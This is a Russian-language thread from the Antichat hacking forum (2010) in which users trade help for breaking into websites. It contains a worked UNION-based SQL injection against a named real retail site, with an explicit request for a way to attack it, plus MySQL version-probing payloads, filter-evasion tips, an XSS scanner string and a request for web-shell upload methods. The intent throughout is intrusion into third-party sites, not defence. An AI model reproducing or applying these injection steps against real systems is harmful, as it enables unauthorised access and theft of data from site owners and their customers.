Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
03.06.2010, 17:46
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Сообщение от Konqi
ребят есть способ заливки шелла через Openads (phpAdsNew) ? 
для кого тему прикрепляли? в след раз будет минус.
|
|
|
03.06.2010, 17:47
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Iceangel_
тынц
для кого тему прикрепляли? в след раз будет минус.
OK , спасибо ))
|
|
|
|
03.06.2010, 18:08
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441
Репутация:
0
|
|
Сообщение от [Feldmarschall]
http://www.kitterytradingpost.com/product.php/prodid/3647
делаешь так
http://www.kitterytradingpost.com/product.php?prodid=-3647 и вот тут дальше копай
http://www.kitterytradingpost.com/product.php?prodid=3647 order by 29 <-error
Итак, мы имеем 28
http://www.kitterytradingpost.com/product.php?prodid=3647 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28-- <- The used SELECT statements have a different number of columns
что случилось? 
|
|
|
|
03.06.2010, 18:33
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441
Репутация:
0
|
|
у нас есть какое-либо решение атаковать этот сайт?
|
|
|
|
03.06.2010, 19:07
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
у нас есть какое-либо решение атаковать этот сайт?
Вопрос №5 Подбираю столбцы ордером пишет(допустим) 2, делаю запрос union+select+1,2 ничего не выводит (выводит ошибку)
Первое что нужно сделать в этом случае. проверить версию базы, например так:
site.com/index.php?id=1+and+substring(version(),1,1)=3
site.com/index.php?id=1+and+substring(version(),1,1)=4
site.com/index.php?id=1+and+substring(version(),1,1)=5
Если оказалось, что версия третья, то неудивительно. что вывода нет, оператор union введён с четвётой версии mysql. B этом случае читаем статьи по проведению инъекций в 3 ветке
Если версия >=4 . или мы видим ошибку different number of columns это вовсе не означает, что вывода не будет.
Вероятность найти вывод всё равно остаётся. По этой теме идём читать сюда:
different number of columns
с поста 79 и вниз со всеми комментариями Читай.
|
|
|
|
03.06.2010, 20:06
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 159
Провел на форуме:
721727
Репутация:
397
|
|
Там еще вырезаются ( ) так что некоторые методы вывода сразу лесом =(
|
|
|
|
03.06.2010, 21:16
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
там вырезаются запятые, проблема именно в этом
http://www.kitterytradingpost.com/product.php?prodid=36,,,,47
|
|
|
|
04.06.2010, 07:04
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
Подскажите команды для работы с sql-inj - mysql 4 ветки.
Команды просмотра таблиц базы данных ну и собсвенно самих таблиц.
А пока вы тут мне подсказываете я на другие форумы полез
P.S с 5 веткой проще работать
|
|
|
|
04.06.2010, 07:17
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от EoGeneo
Подскажите команды для работы с sql-inj - mysql 4 ветки.
Команды просмотра таблиц базы данных ну и собсвенно самих таблиц.
А пока вы тут мне подсказываете я на другие форумы полез
P.S с 5 веткой проще работать
Я ненавижу лето из-за таких вопросов.
1. SQL-инъекции и PROCEDURE ANALYSE() (c) Raz0r.
Но работает реально редко.
2. Бруть.
3. Только в 5 и выше версии mysql, есть information_schema.
4. Удали свой аккаунт с античата.
|
|
|
|
04.06.2010, 07:19
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме:
1096131
Репутация:
45
|
|
Блин, мне уже до неприличия надоело задавать нубские вопросы. Сам не догоняю ((
На запрос:
/index.php?axn=1'
вылазит
INSERT INTO referer VALUES(Null,'мой IP','','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','1275620851','1'')Ungültige Abfrage: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'')' at line 1
на запрос:
/index.php?do=%22%3E%3Cscript%3Ealert%28%27PTsecuri ty+Scanner+Test%27%29%3C%2Fscript%3E%3C%22&name=1& email=scanner@ptsecurity.com&p=1&axn=1&query=1
(это уже из сканера)
выдает
Warning: include(includes/1.inc.php) [function.include]: failed to open stream: No such file or directory in /www/htdocs/w00645df/shop/includes/template.inc.php on line 217
Warning: include(includes/1.inc.php) [function.include]: failed to open stream: No such file or directory in /www/htdocs/w00645df/shop/includes/template.inc.php on line 217
Warning: include() [function.include]: Failed opening 'includes/1.inc.php' for inclusion (include_path='.:/usr/share/php:..') in /www/htdocs/w00645df/shop/includes/template.inc.php on line 217
Внимание, вопрос)) Уязвим?
И еще.
На запрос www.site.com/admin/ вылазит не админка, а какой то код на всю страницу (100500 скролов)
Вот кусочек:
q=tsop6238
q=Atmel+AVR+ISP+mkII
q=Atmel+AVR+ISP+mkII+shop
q=samsung+tantal q=f q=
q=xmega+eur
q=xplain+eur+atmel
q=http://site.com/browse_002002_18__.php q=t
q=DM9161AEP+cost q=f q=
q=ATNGW100
q=attiny25+eur q=f q=
q=gp2y0a21yk+shop q=f q=
q=DM9161AEP
q=eZ430-Chronos-868 q=t
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [ DSU ]](/avatars/avatar43637.gif){kind=avatar}
Похожие темы
Линейный вид
